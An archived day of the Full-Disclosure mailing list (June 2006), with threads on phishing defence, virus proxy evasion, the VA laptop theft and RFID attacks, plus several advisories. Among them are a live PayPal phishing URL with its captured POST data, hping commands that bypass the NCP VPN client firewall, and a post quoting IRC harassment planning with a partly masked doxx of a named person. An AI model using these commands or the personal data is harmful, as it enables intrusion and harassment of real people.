Re: FW: [Full-disclosure] Are consumers being misled by phishing?

2006-06-30 Thread Josh L. Perrymon
-Original Message-From: Ajay Pal Singh Atwal [mailto:
[EMAIL PROTECTED]]Sent: Friday, 30 June 2006 2:46 PMTo: full-disclosure@lists.grok.org.ukSubject: Re: [Full-disclosure] Are consumers being misled by phishing?



Here is one phishing site for paypal

http://www.yourfreespace.net/users/payal/webscr_cmd=_login-run.html




This is not a bad job of duplication. However, pay-pal and similar sites are
used may too much for this type of attack in my opinion. The phishing email
would be probably sent to every email address they could harvest setting off
every alarm Websense has. 



Phishing attacks are most affective when duplicating
something like OWA or Citrix portals.. Or even better -- Custom built company
portals facing the net and only sent to a handful of addresses gathered from company
X.

One interesting note about the site above is that it seems to relay it's data
back to the attacker using POST instead of relying on an underlying mail
program/script.. 



-- POST data from the phishing site above---

HTtp://www.yourfreespace.net/users/payal/Processing+Login.html?login=done0%3F847password=1email=1altaddr=1checkguar=1PPIPProtPlus=PASS_encIP=62.245.23.454enctype=blowfishcontinue=ProcessingLoginacceptlogin=passacceptpassword=passLoginAttempt=SecureLoginPassSecurityMeasureCode=noneb2baf0b6a57d39abd6c44b48d6fe3559112c21e54b7e705ecc5116b3c7c38c37949e8aa81848934faf0821be04210e8c2ded3c4159edbee3ee1439f3892a3e9Access=1Submit=ProcessingLogincmd=_login-processinglogin_cmd=_login-donelogin_access=11680108541


--


Protecting against this type of attack???
I don't know of many existing content gateways / email filters that will stop
the initial email if the attack is a one-off and sent on a small scale. It's
just some verbiage with an A and link to the attackers IP address or
site hosting the phsihing site. A lot of times the web servers have been
compromised and the http server is on a non standard port unless port 80 wasn't
used before.

Then when the user clicks on the link the in the phishing email it opens the
browser w/o triggering any alarms.. ( I haven't visited any sites that the new
M$ phishing filter picked up from its whiltelists)


Enters password.. game over. The attacker now logs in using the new harvested
credentials .This also works with token password generators ( nothing new here
).. Given it's only a 60 second window to login after acquiring the first token
code.



Ideas???_-
End-User security awareness and training is the most important deterrent.
Whitelisting isn't going to stop small footprint attacks directed at a single
company and a handful of users.

Most companies believe that blocking HTML in email handicaps emails effectiveness..
( screw the newsletters.. put it on a website )

Users should copy links from the email into the browser but don't.

Certificates will protect where tokens fail.

Network Protection:
I believe that it's possible to develop widgets to alert on this
type of directed phishing attacks. First you have to have the ability to
monitor all emails traffic. This shouldn't piss off legal because all users
should have already signed off on this.

The most effective would be to monitor all known public email addresses.
Including planted'email address placed in forums and webpages to be
harvested. This would provide a greater % that traffic sent to those addresses
are directed attacks.. (Like an Email Honeypot :)


( yes... need to copyright that one quick muhahah :)

It should be easy to develop an analysis to pick up on standard phishing
emails. You would look for Anchors / links with IP addresses that resolve
outside of the known- whiteliested address list. This should at
least alert and place the email in a second level queue for analysis. You could
also do some type of grep on the email link looking for company X verbiage.





M$ Phishing filter may even be USEFUL ( Almost )

So using the methods above you would have a system to alert on potential
phishing attacks scanning all emails or preferably only public emails included
planted ones.

The widget performs analysis to determine if the email is a phishing attack.

This process could be automated to perform the whois so on… So now we should have determined the IP or
block for the hosted phishing site. We
can use something like M$ phishing filter. Send it the new whitelisted IP
address of the phishing site and the browser should block the site. If the
widget monitors all emails coming into the company then it should have the
ability to do some trending of who received certain emails.. sorted on subjects
for instance. One you found the phishing email you would have a known list of
all email addresses that received the email once the attack has been spotted.



This could be used as additional analysis to monitor traffic
after the attack. 





Just some ideas I have had. If anyone is interested 

Re: [Full-disclosure] Fw: [WEB SECURITY] Application Security Program

2006-06-30 Thread c0redump
Google STRIDE and DREAD in terms of computer security; 
http://wiki.okopipi.org/wiki/Security_concerns


-- c0redump

- Original Message - 
From: huan chen

To: full-disclosure@lists.grok.org.uk
Sent: Friday, June 30, 2006 3:40 AM
Subject: [Full-disclosure] Fw: [WEB SECURITY] Application Security Program


forwarding to this list for opinion...

- Original Message - 
From: huan chen [EMAIL PROTECTED]

To: Web Security [EMAIL PROTECTED]
Sent: Thursday, June 29, 2006 3:51 PM
Subject: [WEB SECURITY] Application Security Program



List,

We are trying to design a big picture information security program for out 
organization. The goal is to concentrate on application security. Sub 
tasks should include stuff like policy gap analysis, pen test balc box and 
white box, etc. The goal is to do all the activities and measure progress 
on an yearly basis/


Are thier any existing frameworks? Anything that has worked / not worked 
for you guys?


Thanks




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/ 



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: FW: [Full-disclosure] Are consumers being misled by phishing?

2006-06-30 Thread Chris Umphress

On 6/29/06, Josh L. Perrymon [EMAIL PROTECTED] wrote:


 Most companies believe that blocking HTML in email handicaps emails
effectiveness.. ( screw the newsletters.. put it on a website )


Hehe, agree with you there.


 Network Protection:
 I believe that it's possible to develop widgets to alert on this type of
directed phishing attacks. First you have to have the ability to monitor all
emails traffic. This shouldn't piss off legal because all users should have
already signed off on this.


MmmHmm. Enter 1984.


 The most effective would be to monitor all known public email addresses.
Including planted' email address placed in forums and webpages to be
harvested. This would provide a greater % that traffic sent to those
addresses are directed attacks.. (Like an Email Honeypot :)


Planted e-mail addresses is an old idea. And so are e-mail honeypots.

Link: http://wiki.apache.org/spamassassin/ReportingMboxesToRazor

I also found a forum recently (sorry, don't remember the link) where
somebody took the IP address of visitors to his site and encrypted it
into a unique e-mail address so that he could learn the IPs of spam
bots.


 It should be easy to develop an analysis to pick up on standard phishing
emails. You would look for Anchors / links with IP addresses that resolve
outside of the known- whiteliested address list. This should at least
alert and place the email in a second level queue for analysis. You could
also do some type of grep on the email link looking for company X verbiage.


So... anything that doesn't match the whitelist gets tested against
the blacklist? :)

Having a more strict filter for users who aren't in the user's address
book is (IMO) one of the best ways, but that relies more on the end
user than on the company's sys admin.


 M$ Phishing filter may even be USEFUL ( Almost )

 So using the methods above you would have a system to alert on potential
phishing attacks scanning all emails or preferably only public emails
included planted ones.

 The widget performs analysis to determine if the email is a phishing
attack.


Thunderbird does some analysis in this area already. It's probably
closely related to the junk filters, but the phishing mails generally
find their way to the Junk or Trash folder before being opened on this
end, so I don't know a lot about it.


 This process could be automated to perform the whois so on…  So now we
should have determined the IP or block for the hosted phishing site.  We can
use something like M$ phishing filter. Send it the new whitelisted IP
address of the phishing site and the browser should block the site. If the
widget monitors all emails coming into the company then it should have the
ability to do some trending of who received certain emails.. sorted on
subjects for instance. One you found the phishing email you would have a
known list of all email addresses that received the email once the attack
has been spotted.


Performing thousands of WHOIS lookups per day for a medium-sized
business might be a little pricey for the purpose. There are tools
(like SpamAssassin) to filter out spam messages -- Even commercial
programs, but from what I hear, none of them is at 100% efficiency.
Hey, AOL is even charging to be on their white list.

The widget might be useful for companies where all e-mail is only
accessible from a web interface (and e-mail can be deleted from the
local mbox file later), but generally you don't argue with the CEO
when he says he wants to use XYZ e-mail client while he is travelling.
Some of the employees, or worse, management, will see these e-mail
messages on occasion. This means that there would either have to be a
delayed delivery system for incoming e-mail, or the e-mail clients
will have to have an understanding of phishing -- and if that were the
case, then the widget should have caught it anyway. The user still
has to be educated.

My solution is simple. We have deer season, rabbit season, and tourist
season. Start a spammer season!

--
Chris Umphress http://daga.dyndns.org/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Corporate Virus Threats

2006-06-30 Thread Castigliola, Angelo
When the malicious code writers build their viruses and Trojans why not
code the threats to detect the use of proxy servers and if used, connect
through them.

Typically you can get to the internet through the default gateway directly from 
the computer without needing to configure proxy settings. A better question 
would be why do viruses run in user-mode versus kernel mode (see 
http://www.phrack.org/show.php?p=62a=6 Kernel-mode backdoors for Windows 
NT)? My guess is that 15-18 year old kids that write viruses mostly use 
recycled code and are often poorly written.

Working in Corporate America, most firewall configurations block outbound
TCP 80, as the proxies listen on other non-standard TCP ports.

I do not agree with this. Most corporations allow outbound TCP 80.

I think this thread is more appropriate for focus-virus and not 
Full-disclosure. 

Angelo Castigliola III
Enterprise Security Architecture
UnumProvident 

The posts and threads in this email do not reflect the opinions of nor are 
endorsed by UnumProvident, Inc., nor any of its employees.

From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Terminal Entry
Sent: Thursday, June 29, 2006 10:14 AM
To: Bug Traq; Full Disclosure
Subject: [Full-disclosure] Corporate Virus Threats

When the malicious code writers build their viruses and Trojans why not code 
the threats to detect the use of proxy servers and if used, connect through 
them.  Working in Corporate America, most firewall configurations block 
outbound TCP 80, as the proxies listen on other non-standard TCP ports.  A 
virus should first check to determine if a proxy is used and if so use that 
proxy to download the malicious code, backdoor, etc.

Thoughts...
 
Terminal Entry

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] NCP VPN/PKI Client: UDP Bypassing

2006-06-30 Thread [EMAIL PROTECTED]

Application:NCP VPN/PKI Client
Site:   http://www.ncp.de
Version:8.30, Build 59 and maybe lower
OS: Windows
Possible problem:   UDP Bypassing


Product:

NCP's Secure Communications provides a comprehensive portfolio of 
products for implementing total solutions for high-security remote 
access. These software-based products comply fully with all current 
major technology standards for communication and encryption, as defined 
by the IETF (Internet Engineering Task Force) and ITU (International 
Telecommunication Union). Consequently all products can be smoothly 
integrated into any existing network and communication architectures. 
Your Internet infrastructure, which may already consist of third-party 
security and access components, can be further used without changes - 
thus avoiding any unnecessary administrative costs.



About:
=
There are two 'firewalls' part of the NCP VPN/PKI Client. The 'Link 
Firewall' and some sort of 'personal firewall'. The function of the 
'Link Firewall' is to prevent any traffic between an untrusted net and 
an active vpn connection. The 'Link Firewall' just can be turned on or 
off. The 'personal firewall' can be configured with rules like all of 
you probably know from other similar personal firewalls.


For my tests I activated the 'Link Firewall' and configured the 
'personal firewall' to prevent any in- or outbound traffic.



UDP Bypassing, both directions
=
During some configuration tests for the NCP VPN/PKI Client I noticed 
that the machine still received an ip-address via DHCP, although both 
firewalls were enabled. So I did some research and figured out that it's 
possible to send and receive data from and to another machine. On the 
client with the NCP VPN/PKI Client installed you have to use port 68 
(UDP, sending and receiving) and on the 'other side' you have to use 
port 67 (UDP, sending and receiving).


For testing I wrote a little perl script which looks so unbelievable 
embarrassing that I better show how to use the bug using hping ;)


So to send something to the machine secured with the NCP VPN/PKI Client 
use hping like this.


hping.exe -2 -c 1 -s 67 -p 68 -e You should've never gone to Hollywood 
$TARGET


To send data from the machine with the NCP VPN/PKI Client to another pc 
use hping like this.


hping.exe -2 -c 1 -s 68 -p 67 -e You should've never trusted Hollywood 
$TARGET


This will also work if you're connected to a VPN.


History:

2006-05-12: Found the possible problems
2006-05-16: Mailed the vendor, no response
2006-05-22: Mailed the vendor again
2006-05-23: The vendor replied
2006-05-26: The vendor replied with technical details


ports

--
SYS 64767

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] FBI Says Data on VA Laptop Not Accessed

2006-06-30 Thread Michael Holstein

The FBI, in a statement from its Baltimore field office, said a
preliminary review of the equipment by its computer forensic teams
has determined that the data base remains intact and has not been
accessed since it was stolen. More tests were planned, however.


Didn't the original wanted notice for this hardware specifically 
mention an external (USB) drive?


Gee .. 'mount -t ntfs -o ro /dev/sda1 /mnt/goodies'

How are their forensic people going to determine if *that* happened?

Their argument about a real crook wouldn't return the hardware .. 
well, why not? .. $50,000 to buy that fancy ID printer off eBay to get 
yourself started.


/mike.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] RFID Attack theory

2006-06-30 Thread Michael Holstein
So most of the research has been done here already.. Which brings me to 
the work done by www.rfidvirus.org http://www.rfidvirus.org
They have some really good ideas about attacking the middleware using 
SQL injections, SSL includes, and buffer overflows on the reader to 
middle ware interface. Some really good stuff.


As small as the actual chips are, imagine how much fun you could have if 
you scattered handfuls of malicious chips around your favorite 
high-security place (airport, office, whatever...).


You could render these high-tech authentication schemes completely 
useless .. just like the military does with their carbon-fiber bombs 
designed to defeat electrical gear.


/mike.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] FBI Says Data on VA Laptop Not Accessed

2006-06-30 Thread Cardoso
I don't think they can detect some highly advanced techniques like using
Partition Magic to mirror the disk..



On Fri, 30 Jun 2006 10:07:46 -0400
Michael Holstein [EMAIL PROTECTED] wrote:

MH The FBI, in a statement from its Baltimore field office, said a
MH preliminary review of the equipment by its computer forensic teams
MH has determined that the data base remains intact and has not been
MH accessed since it was stolen. More tests were planned, however.
MH 
MH Didn't the original wanted notice for this hardware specifically 
MH mention an external (USB) drive?
MH 
MH Gee .. 'mount -t ntfs -o ro /dev/sda1 /mnt/goodies'
MH 
MH How are their forensic people going to determine if *that* happened?
MH 
MH Their argument about a real crook wouldn't return the hardware .. 
MH well, why not? .. $50,000 to buy that fancy ID printer off eBay to get 
MH yourself started.
MH 
MH /mike.
MH 
MH ___
MH Full-Disclosure - We believe in it.
MH Charter: http://lists.grok.org.uk/full-disclosure-charter.html
MH Hosted and sponsored by Secunia - http://secunia.com/
MH 

year(now) + 1 será o ano do linux!
Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299
vida digital: http://www.contraditorium.com site pessoal e blog: 
http://www.carloscardoso.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] FBI Says Data on VA Laptop Not Accessed

2006-06-30 Thread Michael Braun

Cardoso schrieb:

I don't think they can detect some highly advanced techniques like using
Partition Magic to mirror the disk..


  
As long as they didn't know the exact amount of hours the hdd was 
running before it got stolen, i don't see any way to determine if the 
data was copied away by some sector-by-sector copy-tool like Ghost or 
True Image. Afaik you can see very clearly how many hours a drive has 
run yet. If that data was the same as before the laptop was stolen, then 
the disk didn't run. If the data differs, the drive did run.

I am not sure if one could alter that data.
On the other hand... i don't think that anyone knows that data all the 
time, so they couldn't have known the running-time of the disk, unless 
they knew the hdd was about to be stolen.


(pardon my bad english)

Michael

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ GLSA 200606-30 ] Kiax: Arbitrary code execution

2006-06-30 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200606-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Kiax: Arbitrary code execution
  Date: June 30, 2006
  Bugs: #136099
ID: 200606-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A security vulnerability in the iaxclient library could lead to the
execution of arbitrary code by a remote attacker.

Background
==

Kiax is a graphical softphone supporting the IAX protocol (Inter
Asterisk eXchange), which allows PC users to make VoIP calls to
Asterisk servers.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  net-misc/kiax  0.8.5_p1  = 0.8.5_p1

Description
===

The iax_net_read function in the iaxclient library fails to properly
handle IAX2 packets with truncated full frames or mini-frames. These
frames are detected in a length check but processed anyway, leading to
buffer overflows.

Impact
==

By sending a specially crafted IAX2 packet, an attacker could execute
arbitrary code with the permissions of the user running Kiax.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Kiax users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-misc/kiax-0.8.5_p1

References
==

  [ 1 ] CVE-2006-2923
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2923

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200606-30.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpSrjNX54VaP.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-06-020: Apple iTunes AAC File Parsing Integer Overflow Vulnerability

2006-06-30 Thread zdi-disclosures
ZDI-06-020: Apple iTunes AAC File Parsing Integer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-020.html
June 29, 2006

-- CVE ID:
CVE-2006-1467

-- Affected Vendor:
Apple

-- Affected Products:
iTunes

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since April  3, 2006 by Digital Vaccine protection
filter ID 4282. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Apple iTunes. Exploitation requires an
attacker to convince a target user into opening a malicious play list
file.

The specific flaw exists during the processing of malicious AAC media
files such as those with extensions .M4A and .M4P. During the parsing
of the sample table size atom (STSZ), a malformed 'sample_size_table'
value can trigger an integer overflow leading to an exploitable memory
corruption.

-- Vendor Response:
Apple has addressed this issue in the latest release of iTunes, version
6.0.5. More information is available from the vendor web site at:

http://docs.info.apple.com/article.html?artnum=303952

-- Disclosure Timeline:
2006.04.03 - Digital Vaccine released to TippingPoint customers
2006.04.07 - Vulnerability reported to vendor
2006.06.29 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by ATmaCA.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Corporate Virus Threats

2006-06-30 Thread n3td3v

On 6/30/06, Castigliola, Angelo [EMAIL PROTECTED] wrote:

When the malicious code writers build their viruses and Trojans why not
code the threats to detect the use of proxy servers and if used, connect
through them.

Typically you can get to the internet through the default gateway directly from the computer 
without needing to configure proxy settings. A better question would be why do viruses run in 
user-mode versus kernel mode (see http://www.phrack.org/show.php?p=62a=6 
Kernel-mode backdoors for Windows NT)? My guess is that 15-18 year old kids that 
write viruses mostly use recycled code and are often poorly written.

Working in Corporate America, most firewall configurations block outbound
TCP 80, asthe proxies listen on other non-standard TCP ports.

I do not agree with this. Most corporations allow outbound TCP 80.

I think this thread is more appropriate for focus-virus and not Full-disclosure.


Full-Disclosure should setup its own dedicated lists for individual
topics like securityfocus.com do.

The thought of going near a Symantec run list makes me cringe.

John Cartwright, can we have more Full-Disclosure lists setup for
specialized topics?

Heres my suggestions:

FD social engineering and phishing list - discussion of social
engineering issues and its variants

FD vulnerability development list - discussion of development and
prevention of vulnerabilities

FD incident response and recovery list - discussion of response and
recovery issues

FD voice over internet protocol list - discussion of VoIP security issues

FD web application security list - discussion of web application, and
AJAX, FJAX secure coding.

FD bug disclosures list - discussion of new security threats and analysis

FD enterprise security list - discussion of corporate security issues,
and patch management, and employee monitoring

FD security careers list - discussion of latest jobs within security industry

FD media coverage list - discussion of security related stories in the news

FD vendor software support list - discussion of security product
support, anti virus, ids, firewall issues, security basics, setting up
software securely

FD is the future! Its time to upgrade FD, so we can take on the might
of Securityfocus.com, and give them a run for their money. Don't copy
Securityfocus though, originate, not duplicate!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread AMIT SECURITY

HELLO, MY NAME AMIT. I SECURITY RESEARCH FROM ALL OVER WORLD AND
CURRENTLY THIS MY FIRST ADVISORY TO ANYONE RESARCHING. I POST TO
MAILING LIST IN INTEREST OF EXPULSION OF KNOWLEDGE.

RECENTLY I HEAR OF FREENODE ATTACK AND SOME OPERATORS OWNED FROM
SNIFFING OR SOMETHING LIKE THAT. THIS VERY BAD BUT IT HAPPEN IN MY
COUNTRY ALL TIME. I SAY TO MYSELF, AMIT, YOU MUST HELP CATCH CRIMINAL
WHO DO THIS TO NON-PROFIT ORGANISATION SO I SET OUT TO LEARN ALL THAT
I CAN ABOUT THAT CRIMINAL. I FIND OUT TWO GROUP ARE MAY BE TO BLAME,
GNNA AND BANTOWNE.  GNNA STAND FOR GAY NATIONAL NARCOTICS ALLEGIANCE
MY FRIEND FROM WORK SAY, BUT HE NOT KNOW WHAT BANTOWNE STAND FOR. I
FIND NO INFO ON GAY NATIONAL NARCOTICS ALLIANCE, AND MY INTUITION
TELL ME BANTOWNE TO BLAME.  SO THROUGH DEVIOUS MEANS I INFILTRATE
BANTOWNE IRC CHANNEL WITH IS LOCATED AT IRC.BANTOWN.ORG (NOTE: IT
MINUS THE E) AND THE CHANNEL IS HIDDEN BUT STILL I FIND IT. IT
CALLED #BANTOWN (MINUS THE E TOO).

THIS IRC CHANNEL IS FULL OF THE BADDEST SCRIPT KIDDIE I HAVE SEEN IN A
LONG WHILE, AND I WORK ON SECURITY FOR OVER 20 YEAR, EVEN BEFORE
MODERN PC ARE COMMONPLACE AS USER. EVEN SOME PEOPLE IN CHANNEL KNOW
PERL OR OTHER USEFUL LANGUAGE. I VERY IMPRESSED. SOME FRIENDLY PEOPLE
IN CHANNEL, LOT OF THEM SAY LOL MOST TIME THEY SPEAK. SOME NOT SO
FRIENDLY, SAY BAD WORD BUT THAT OK, THEY CRIMINAL SO WHO CARE. I
PRESENT FRIENDLY APPEARANCE, THEY TALK FRIENDLY TO ME. THIS NIGHT OF
FREENODE HACK NEWS AND THEY PISSED OFF AT LILO, WHO SEEM TO BE SEMI
TRUCK DRIVER AND LIVE IN BACK OF TRUCK IN TRUCK TRAILER, CAUSE THEY
SAY HE LOTS OF BAD THINGS. SOME OF THEM BE VERY SKILLED PROFESSIONAL
AT HACK. ONE GO BY INCOG AND HE MASTER OF CROSSED-SITE-SCRIPTING
VULNERABILITY. HE SURF SITES LOOKING FOR VULNERABILITY ALL DAY LONG. I
EXCERPT FROM CHANNEL:

incog that reminds me... ill go find xss in fark.com
incog k, i just found xss in imdb... but my memory is so bad that i
dont know if this is new or i just rediscovered it
incog just found xss in youtube
incog i have xss on flickr
incog xss on technocrati
incog weev, i have xss on all turdpress blogs ever
lncog i just found dailykos xss for rolloffle
whatcog I have SA xss
whatcog on secure.somethingawful.com

THAT OVER FEW DAYS OF TALK. INCOG SEEM TO BE MOST BRUTAL SCRIPT-KIDDIE
KNOWN TO MAN, BUT WE CHECK OUT ANOTHER PERSON HE CALLED WEEV. HE
BEEN AROUND THE BLOCK A LONG TIME AND HE HAVE MANY IDEA HOW TO CAUSE
DAMAGE TO FREENODE AND A MAN NAME LILO. AGAIN I EXCERPT FROM
CHANNEL:

weev okay guys
weev i need you to find some mexican woman in houston
weev and just relentlessly troll her
weev call her up at all hours of the night
weev screaming ROB LEVIN, ROB LEVIN
weev and then we're going to say she's the nanny for his kids

WEEVE ALSO ENCOURAGE INGOC TO HACKING ACTIVITIES, PROBABLY FOR HIS
OWN USAGE LATER ON. I EXCERPT:

weev incog: can you get flickr?
incog ill try
cstone oh god flickr would be hilarious
incog flickr uses yahoo id's
weev not necessarily
weev there are internal flickr ids too
weev and it doesnt use the yahoo cookie
weev basically you auth with your yahoo id
weev and then it gives you a flickr cookie
weev and from there its all flickr

LIKE SAID, WEEV KNOW A LOT AND PROBABLY RINGLEADER, OR AS THEY SAID
IN AMERICA, MASTER OF PUPPETS. AND I DO THINK MANY PEOPLE ON THE
CHANNEL PUPPETS. SOME VERY SCRIPT-KIDDIE LIKE. WELL, IT OBVIOUS ALL
ARE SCRIPT KIDDIE, BUT SOME ARE VERY. VERY. MOST ALSO IRC KIDDIE. I
EXCERPT:

tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
bizzy WHY IS SALAD SO GOOD?!!?!
bizzy WHY IS SALAD SO GOOD?!!?!
bizzy WHY IS SALAD SO GOOD?!!?!

AS YOU CAN SEE, SOME VERY DUMB AND NOT UNDERSTAND IRC CLIENT PROPERLY.
THERE MANY MORE EXAMPLE OF ABOVE EXCERPT, BUT I LIMIT TO THAT CAUSE IS
ANNOYING. BUT WORSE IS YET TO COME, B/C WEEAVE POST PERSONAL
INFOMATION OF ROBERT LIVIN, OTHERWISE KNOWN AS LELO ON FREENODE
NETWORK, THE TRUCK DRIVER, FOR PLANE VIEW OF ALL TO ABUSE. BANTOWN
ALSO RESPONSIBLE FOR POST OF INFORMATION TO CRAIGLIST AND OTHER
PLACES. I EXCERPT BUT MUST CENSOR SO THIS INFO IS NOT USED FOR CRIME:

weev philsanchez: lilo's federal employer identification number is xx-xxx
weev his federal identification number is xx-xxx
weev the address officially listed for pdpc is 10100 main street #31
houson tx 77025
weev phone number for pdpc officially listed is 713-589-5863
weev his ssn is xxx xx 
weev his dob is xx-xx-1955
weev 11-digit texas state taxpayer number xxx
weev ROBERT LEVIN
weev 9212 BURDINE ST. #1005
weev HOUSTON, TX 77096
weev the last address is his apartment
weev no, he doesnt live in a trailer

MANY ON #BANTOON SPEAK HIGHLY OF RUIN, WHICH IS SKRIPT-KIDDIE FOR
CAUSE HAVOK ON IRC OR NETWORK OR SOME MAIL PROGRAMS. SOME ALSO EAT
SALAD OR DISPLAY ANNOYING QUIRK WHERE THEY NOT MAKE SENSE FOR EXTENDED
PERIOD OF TIME AND ACT LIKE 

RE: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread php0t


  Thanks for the 0day advisory! It helped out a lot.

(ps: 10yrs English course, 10yrs security would have been a better
choice for you if you ask me)

 HELLO, MY NAME AMIT. I SECURITY RESEARCH FROM ALL OVER WORLD AND
CURRENTLY THIS MY FIRST 
 ADVISORY TO ANYONE RESARCHING. I POST TO MAILING LIST IN INTEREST OF
EXPULSION OF KNOWLEDGE.

 THIS IRC CHANNEL IS FULL OF THE BADDEST SCRIPT KIDDIE I HAVE SEEN IN A
LONG WHILE, AND I WORK ON 
 SECURITY FOR OVER 20 YEAR, EVEN BEFORE MODERN PC ARE COMMONPLACE AS
USER. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Browser bugs hit IE, Firefox today (SANS)

2006-06-30 Thread Schmehl, Paul L
 -Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Juha-Matti
Laurio
Sent: Thursday, June 29, 2006 8:08 PM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Browser bugs hit IE, Firefox today (SANS)

The related SANS Internet Storm Center Diary entry is the following:
http://isc.sans.org/diary.php?storyid=1448

This story was updated later on Wednesday to include detailed test results.
Secunia test link included to SA20825 advisory was used.

I have not reproduced it with Firefox 1.5.0.4 in Win XP SP2 and W2K SP4 SF,
for some reason.
Firefox version is localized in my test environment, as well.

Tested on:
Firefox 1.5.0.4 on Mac OS 10.4 - not vulnerable
Firefox 1.5.0.4 on FreeBSD 6.0 (x86)  - not vulnerable
Firefox 1.5.0.4 on Windows XP Professional SP2 - not vulnerable
Internet Explorer 6.0.2900.2180.xpsp.050622-1524 on Windows XP Professional
SP2 - vulnerable

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
http://www.utdallas.edu/ir/security/


smime.p7s
Description: S/MIME cryptographic signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] New member asking question...

2006-06-30 Thread Reynolds, Joseph R

Question for everyone on the board?

I have been reading the posts over the past few weeks, and am wondering
how the heck you guy discover these vulnerabilities.  Granted, I am
still very new to the IS world, but I cannot begin to understand how you
discover weaknesses.  After reading these posts, the explanation always
makes since, but are you guys actively seeking weaknesses, or just
happen to come across them?

Also, are there any good Hacking books that I could read?  I have had
a Hackers Tool and Techniques class at school, but all of the programs
are very outdated, like l0phtcrack, JTR, ethereal or wireshark, and
such.  I am looking to actually enter systems or find ways to enter
systems and understand the weakness that allows it so I can avoid it
later. 

Thanks everyone.


Joseph K. Reynolds
Systems Support Analyst - Intermediate
Enterprise Rent-A-Car
Email JR Reynolds
314-512-2370


___
Full-Disclosure - We believe in it.
